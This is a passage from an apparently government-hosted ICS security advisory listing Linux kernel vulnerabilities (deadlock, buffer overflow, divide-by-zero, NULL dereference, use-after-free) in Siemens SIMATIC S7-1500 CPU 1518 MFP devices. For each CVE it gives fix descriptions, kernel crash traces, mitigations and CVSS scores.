<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1287.html">CWE-1287 Improper Validation of Specified Type of Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23368</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: phy: register phy led_triggers during probe to avoid AB-BA deadlock There is an AB-BA deadlock when both LEDS_TRIGGER_NETDEV and LED_TRIGGER_PHY are enabled: [ 1362.049207] [&lt;8054e4b8&gt;] led_trigger_register+0x5c/0x1fc &lt;-- Trying to get lock "triggers_list_lock" via down_write(&amp;triggers_list_lock); [ 1362.054536] [&lt;80662830&gt;] phy_led_triggers_register+0xd0/0x234 [ 1362.060329] [&lt;8065e200&gt;] phy_attach_direct+0x33c/0x40c [ 1362.065489] [&lt;80651fc4&gt;] phylink_fwnode_phy_connect+0x15c/0x23c [ 1362.071480] [&lt;8066ee18&gt;] mtk_open+0x7c/0xba0 [ 1362.075849] [&lt;806d714c&gt;] __dev_open+0x280/0x2b0 [ 1362.080384] [&lt;806d7668&gt;] __dev_change_flags+0x244/0x24c [ 1362.085598] [&lt;806d7698&gt;] dev_change_flags+0x28/0x78 [ 1362.090528] [&lt;807150e4&gt;] dev_ioctl+0x4c0/0x654 &lt;-- Hold lock "rtnl_mutex" by calling rtnl_lock(); [ 1362.094985] [&lt;80694360&gt;] sock_ioctl+0x2f4/0x4e0 [ 1362.099567] [&lt;802e9c4c&gt;] sys_ioctl+0x32c/0xd8c [ 1362.104022] [&lt;80014504&gt;] syscall_common+0x34/0x58 Here LED_TRIGGER_PHY is registering LED triggers during phy_attach while holding RTNL and then taking triggers_list_lock. [ 1362.191101] [&lt;806c2640&gt;] register_netdevice_notifier+0x60/0x168 &lt;-- Trying to get lock "rtnl_mutex" via rtnl_lock(); [ 1362.197073] [&lt;805504ac&gt;] netdev_trig_activate+0x194/0x1e4 [ 1362.202490] [&lt;8054e28c&gt;] led_trigger_set+0x1d4/0x360 &lt;-- Hold lock "triggers_list_lock" by down_read(&amp;triggers_list_lock); [ 1362.207511] [&lt;8054eb38&gt;] led_trigger_write+0xd8/0x14c [ 1362.212566] [&lt;80381d98&gt;] sysfs_kf_bin_write+0x80/0xbc [ 1362.217688] [&lt;8037fcd8&gt;] kernfs_fop_write_iter+0x17c/0x28c [ 1362.223174] [&lt;802cbd70&gt;] vfs_write+0x21c/0x3c4 [ 1362.227712] [&lt;802cc0c4&gt;] ksys_write+0x78/0x12c [ 1362.232164] [&lt;80014504&gt;] syscall_common+0x34/0x58 Here LEDS_TRIGGER_NETDEV is being enabled on an LED. It first takes triggers_list_lock and then RTNL. A classical AB-BA deadlock. phy_led_triggers_registers() does not require the RTNL, it does not make any calls into the network stack which require protection. There is also no requirement the PHY has been attached to a MAC, the triggers only make use of phydev state. This allows the call to phy_led_triggers_registers() to be placed elsewhere. PHY probe() and release() don't hold RTNL, so solving the AB-BA deadlock.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23368">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23370</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: platform/x86: dell-wmi-sysman: Don't hex dump plaintext password data set_new_password() hex dumps the entire buffer, which contains plaintext password data, including current and new passwords. Remove the hex dump to avoid leaking credentials.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23370">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/256.html">CWE-256 Plaintext Storage of a Password</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23378</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: act_ife: Fix metalist update behavior Whenever an ife action replace changes the metalist, instead of replacing the old data on the metalist, the current ife code is appending the new metadata. Aside from being innapropriate behavior, this may lead to an unbounded addition of metadata to the metalist which might cause an out of bounds error when running the encode op: [ 138.423369][ C1] ================================================================== [ 138.424317][ C1] BUG: KASAN: slab-out-of-bounds in ife_tlv_meta_encode (net/ife/ife.c:168) [ 138.424906][ C1] Write of size 4 at addr ffff8880077f4ffe by task ife_out_out_bou/255 [ 138.425778][ C1] CPU: 1 UID: 0 PID: 255 Comm: ife_out_out_bou Not tainted 7.0.0-rc1-00169-gfbdfa8da05b6 #624 PREEMPT(full) [ 138.425795][ C1] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 138.425800][ C1] Call Trace: [ 138.425804][ C1] [ 138.425808][ C1] dump_stack_lvl (lib/dump_stack.c:122) [ 138.425828][ C1] print_report (mm/kasan/report.c:379 mm/kasan/report.c:482) [ 138.425839][ C1] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 138.425844][ C1] ? __virt_addr_valid (./arch/x86/include/asm/preempt.h:95 (discriminator 1) ./include/linux/rcupdate.h:975 (discriminator 1) ./include/linux/mmzone.h:2207 (discriminator 1) arch/x86/mm/physaddr.c:54 (discriminator 1)) [ 138.425853][ C1] ? ife_tlv_meta_encode (net/ife/ife.c:168) [ 138.425859][ C1] kasan_report (mm/kasan/report.c:221 mm/kasan/report.c:597) [ 138.425868][ C1] ? ife_tlv_meta_encode (net/ife/ife.c:168) [ 138.425878][ C1] kasan_check_range (mm/kasan/generic.c:186 (discriminator 1) mm/kasan/generic.c:200 (discriminator 1)) [ 138.425884][ C1] __asan_memset (mm/kasan/shadow.c:84 (discriminator 2)) [ 138.425889][ C1] ife_tlv_meta_encode (net/ife/ife.c:168) [ 138.425893][ C1] ? ife_tlv_meta_encode (net/ife/ife.c:171) [ 138.425898][ C1] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 138.425903][ C1] ife_encode_meta_u16 (net/sched/act_ife.c:57) [ 138.425910][ C1] ? __pfx_do_raw_spin_lock (kernel/locking/spinlock_debug.c:114) [ 138.425916][ C1] ? __asan_memcpy (mm/kasan/shadow.c:105 (discriminator 3)) [ 138.425921][ C1] ? __pfx_ife_encode_meta_u16 (net/sched/act_ife.c:45) [ 138.425927][ C1] ? srso_alias_return_thunk (arch/x86/lib/retpoline.S:221) [ 138.425931][ C1] tcf_ife_act (net/sched/act_ife.c:847 net/sched/act_ife.c:879) To solve this issue, fix the replace behavior by adding the metalist to the ife rcu data structure.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23378">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/120.html">CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23379</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: fix divide by zero in the offload path Offloading ETS requires computing each class' WRR weight: this is done by averaging over the sums of quanta as 'q_sum' and 'q_psum'. Using unsigned int, the same integer size as the individual DRR quanta, can overflow and even cause division by zero, like it happened in the following splat: Oops: divide error: 0000 [#1] SMP PTI CPU: 13 UID: 0 PID: 487 Comm: tc Tainted: G E 6.19.0-virtme #45 PREEMPT(full) Tainted: [E]=UNSIGNED_MODULE Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 RIP: 0010:ets_offload_change+0x11f/0x290 [sch_ets] Code: e4 45 31 ff eb 03 41 89 c7 41 89 cb 89 ce 83 f9 0f 0f 87 b7 00 00 00 45 8b 08 31 c0 45 01 cc 45 85 c9 74 09 41 6b c4 64 31 d2 &lt;41&gt; f7 f2 89 c2 44 29 fa 45 89 df 41 83 fb 0f 0f 87 c7 00 00 00 44 RSP: 0018:ffffd0a180d77588 EFLAGS: 00010246 RAX: 00000000ffffff38 RBX: ffff8d3d482ca000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffd0a180d77660 RBP: ffffd0a180d77690 R08: ffff8d3d482ca2d8 R09: 00000000fffffffe R10: 0000000000000000 R11: 0000000000000000 R12: 00000000fffffffe R13: ffff8d3d472f2000 R14: 0000000000000003 R15: 0000000000000000 FS: 00007f440b6c2740(0000) GS:ffff8d3dc9803000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000003cdd2000 CR3: 0000000007b58002 CR4: 0000000000172ef0 Call Trace: ets_qdisc_change+0x870/0xf40 [sch_ets] qdisc_create+0x12b/0x540 tc_modify_qdisc+0x6d7/0xbd0 rtnetlink_rcv_msg+0x168/0x6b0 netlink_rcv_skb+0x5c/0x110 netlink_unicast+0x1d6/0x2b0 netlink_sendmsg+0x22e/0x470 ____sys_sendmsg+0x38a/0x3c0 ___sys_sendmsg+0x99/0xe0 __sys_sendmsg+0x8a/0xf0 do_syscall_64+0x111/0xf80 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f440b81c77e Code: 4d 89 d8 e8 d4 bc 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa RSP: 002b:00007fff951e4c10 EFLAGS: 00000202 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000481820 RCX: 00007f440b81c77e RDX: 0000000000000000 RSI: 00007fff951e4cd0 RDI: 0000000000000003 RBP: 00007fff951e4c20 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff951f4fa8 R13: 00000000699ddede R14: 00007f440bb01000 R15: 0000000000486980 Modules linked in: sch_ets(E) netdevsim(E) ---[ end trace 0000000000000000 ]--- RIP: 0010:ets_offload_change+0x11f/0x290 [sch_ets] Code: e4 45 31 ff eb 03 41 89 c7 41 89 cb 89 ce 83 f9 0f 0f 87 b7 00 00 00 45 8b 08 31 c0 45 01 cc 45 85 c9 74 09 41 6b c4 64 31 d2 &lt;41&gt; f7 f2 89 c2 44 29 fa 45 89 df 41 83 fb 0f 0f 87 c7 00 00 00 44 RSP: 0018:ffffd0a180d77588 EFLAGS: 00010246 RAX: 00000000ffffff38 RBX: ffff8d3d482ca000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffd0a180d77660 RBP: ffffd0a180d77690 R08: ffff8d3d482ca2d8 R09: 00000000fffffffe R10: 0000000000000000 R11: 0000000000000000 R12: 00000000fffffffe R13: ffff8d3d472f2000 R14: 0000000000000003 R15: 0000000000000000 FS: 00007f440b6c2740(0000) GS:ffff8d3dc9803000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000003cdd2000 CR3: 0000000007b58002 CR4: 0000000000172ef0 Kernel panic - not syncing: Fatal exception Kernel Offset: 0x30000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff) ---[ end Kernel panic - not syncing: Fatal exception ]--- Fix this using 64-bit integers for 'q_sum' and 'q_psum'.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23379">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23381</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix nd_tbl NULL dereference when IPv6 is disabled When booting with the 'ipv6.disable=1' parameter, the nd_tbl is never initialized because inet6_init() exits before ndisc_init() is called which initializes it. Then, if neigh_suppress is enabled and an ICMPv6 Neighbor Discovery packet reaches the bridge, br_do_suppress_nd() will dereference ipv6_stub-&gt;nd_tbl which is NULL, passing it to neigh_lookup(). This causes a kernel NULL pointer dereference. BUG: kernel NULL pointer dereference, address: 0000000000000268 Oops: 0000 [#1] PREEMPT SMP NOPTI [...] RIP: 0010:neigh_lookup+0x16/0xe0 [...] Call Trace: ? neigh_lookup+0x16/0xe0 br_do_suppress_nd+0x160/0x290 [bridge] br_handle_frame_finish+0x500/0x620 [bridge] br_handle_frame+0x353/0x440 [bridge] __netif_receive_skb_core.constprop.0+0x298/0x1110 __netif_receive_skb_one_core+0x3d/0xa0 process_backlog+0xa0/0x140 __napi_poll+0x2c/0x170 net_rx_action+0x2c4/0x3a0 handle_softirqs+0xd0/0x270 do_softirq+0x3f/0x60 Fix this by replacing IS_ENABLED(IPV6) call with ipv6_mod_enabled() in the callers. This is in essence disabling NS/NA suppression when IPv6 is disabled.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23381">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/824.html">CWE-824 Access of Uninitialized Pointer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23391</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: xt_CT: drop pending enqueued packets on template removal Templates refer to objects that can go away while packets are sitting in nfqueue refer to: - helper, this can be an issue on module removal. - timeout policy, nfnetlink_cttimeout might remove it. The use of templates with zone and event cache filter are safe, since this just copies values. Flush these enqueued packets in case the template rule gets removed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23391">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/911.html">CWE-911 Improper Update of Reference Count</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23392</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: release flowtable after rcu grace period on error Call synchronize_rcu() after unregistering the hooks from error path, since a hook that already refers to this flowtable can be already registered, exposing this flowtable to packet path and nfnetlink_hook control plane. This error path is rare, it should only happen by reaching the maximum number hooks or by failing to set up to hardware offload, just call synchronize_rcu(). There is a check for already used device hooks by different flowtable that could result in EEXIST at this late stage. The hook parser can be updated to perform this check earlier to this error path really becomes rarely exercised. Uncovered by KASAN reported as use-after-free from nfnetlink_hook path when dumping hooks.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23392">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
